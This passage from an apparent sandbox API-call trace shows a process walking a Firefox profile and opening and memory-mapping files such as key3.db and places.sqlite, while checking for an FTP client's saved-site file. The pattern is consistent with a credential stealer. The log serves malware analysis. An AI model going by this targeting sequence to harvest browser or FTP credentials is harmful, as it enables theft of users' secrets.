hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0590.692] LocalFree (hMem=0x56cab0) returned 0x0 [0590.692] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.692] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.692] lstrlenW (lpString="\\") returned 1 [0590.692] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.692] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.692] lstrlenW (lpString="key3.db") returned 7 [0590.692] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.692] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63bbf0 [0590.692] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.692] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.692] CloseHandle (hObject=0x5ac) returned 1 [0590.692] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x54 [0590.692] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63bd28 [0590.692] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db", lpDst=0x63bd28, nSize=0x54 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db") returned 0x54 [0590.692] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.693] CloseHandle (hObject=0x5ac) returned 1 [0590.693] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.693] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4000 [0590.693] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.693] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.693] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.693] CloseHandle (hObject=0x4c8) returned 1 [0590.693] CloseHandle (hObject=0x5ac) returned 1 [0590.693] LocalFree (hMem=0x63bd28) returned 0x0 [0590.693] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.693] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.693] lstrlenW (lpString="\\") returned 1 [0590.693] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.693] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.693] lstrlenW (lpString="localstore.rdf") returned 14 [0590.693] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.693] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.693] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.693] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.694] CloseHandle (hObject=0x5ac) returned 1 [0590.694] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.694] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5dbdf0 [0590.694] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf", lpDst=0x5dbdf0, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf") returned 0x5b [0590.694] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.694] CloseHandle (hObject=0x5ac) returned 1 [0590.694] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.694] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4fe [0590.694] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.694] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.694] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.694] CloseHandle (hObject=0x4c8) returned 1 [0590.694] CloseHandle (hObject=0x5ac) returned 1 [0590.694] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.694] LocalFree (hMem=0x56cab0) returned 0x0 [0590.694] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.694] lstrlenW (lpString="\\") returned 1 [0590.694] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.694] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.694] lstrlenW (lpString="marionette.log") returned 14 [0590.694] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.694] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.695] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.695] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.695] CloseHandle (hObject=0x5ac) returned 1 [0590.695] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.695] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5dbdf0 [0590.695] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log", lpDst=0x5dbdf0, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log") returned 0x5b [0590.695] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.695] CloseHandle (hObject=0x5ac) returned 1 [0590.695] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.695] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x39 [0590.695] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.695] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.695] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.695] CloseHandle (hObject=0x4c8) returned 1 [0590.695] CloseHandle (hObject=0x5ac) returned 1 [0590.695] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.695] LocalFree (hMem=0x56cab0) returned 0x0 [0590.695] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.695] lstrlenW (lpString="\\") returned 1 [0590.696] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.696] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.696] lstrlenW (lpString="mimeTypes.rdf") returned 13 [0590.696] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.696] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.696] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.696] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.696] CloseHandle (hObject=0x5ac) returned 1 [0590.696] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0590.696] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x5dbdf0 [0590.696] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf", lpDst=0x5dbdf0, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf") returned 0x5a [0590.696] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.696] CloseHandle (hObject=0x5ac) returned 1 [0590.696] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.696] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xef3 [0590.696] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.696] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.696] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.696] CloseHandle (hObject=0x4c8) returned 1 [0590.696] CloseHandle (hObject=0x5ac) returned 1 [0590.697] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.697] LocalFree (hMem=0x56cab0) returned 0x0 [0590.697] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.697] lstrcmpiW (lpString1="minidumps", lpString2=".") returned 1 [0590.697] lstrcmpiW (lpString1="minidumps", lpString2="..") returned 1 [0590.697] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.697] lstrlenW (lpString="\\") returned 1 [0590.697] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.697] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.697] lstrlenW (lpString="minidumps") returned 9 [0590.697] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.697] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x63bbf0 [0590.697] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.697] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps") returned 85 [0590.697] lstrlenW (lpString="\\*.*") returned 4 [0590.697] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps") returned 85 [0590.697] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.697] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps\\*.*", lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 0x57ca60 [0590.697] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.697] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 1 [0590.697] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.697] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.697] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 0 [0590.697] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0590.697] LocalFree (hMem=0x56cab0) returned 0x0 [0590.697] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.697] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.697] lstrlenW (lpString="\\") returned 1 [0590.697] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.697] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.697] lstrlenW (lpString="parent.lock") returned 11 [0590.697] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.697] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bbf0 [0590.697] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.697] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.697] CloseHandle (hObject=0x5ac) returned 1 [0590.697] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0590.697] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bd28 [0590.697] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock", lpDst=0x63bd28, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock") returned 0x58 [0590.697] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.697] CloseHandle (hObject=0x5ac) returned 1 [0590.697] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.698] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0590.698] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0590.698] CloseHandle (hObject=0x5ac) returned 1 [0590.698] LocalFree (hMem=0x63bd28) returned 0x0 [0590.698] StrStrIW (lpFirst="parent.lock", lpSrch="fireFTPsites.dat") returned 0x0 [0590.698] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.698] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.698] lstrlenW (lpString="\\") returned 1 [0590.698] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.698] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.698] lstrlenW (lpString="permissions.sqlite") returned 18 [0590.698] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.698] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56cab0 [0590.698] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.698] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.698] CloseHandle (hObject=0x5ac) returned 1 [0590.698] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5f [0590.698] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x5dbdf0 [0590.698] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite", lpDst=0x5dbdf0, nSize=0x5f | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite") returned 0x5f [0590.698] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.698] CloseHandle (hObject=0x5ac) returned 1 [0590.698] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.698] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0590.698] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.698] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.699] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.699] CloseHandle (hObject=0x4c8) returned 1 [0590.699] CloseHandle (hObject=0x5ac) returned 1 [0590.699] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.699] LocalFree (hMem=0x56cab0) returned 0x0 [0590.699] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.699] lstrlenW (lpString="\\") returned 1 [0590.699] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.699] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.699] lstrlenW (lpString="places.sqlite") returned 13 [0590.699] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.699] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.699] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.699] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.699] CloseHandle (hObject=0x5ac) returned 1 [0590.700] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0590.700] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x5dbdf0 [0590.700] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite", lpDst=0x5dbdf0, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite") returned 0x5a [0590.700] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.700] CloseHandle (hObject=0x5ac) returned 1 [0590.700] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.700] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa00000 [0590.700] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.700] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0590.793] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.793] LocalFree (hMem=0x56cab0) returned 0x0 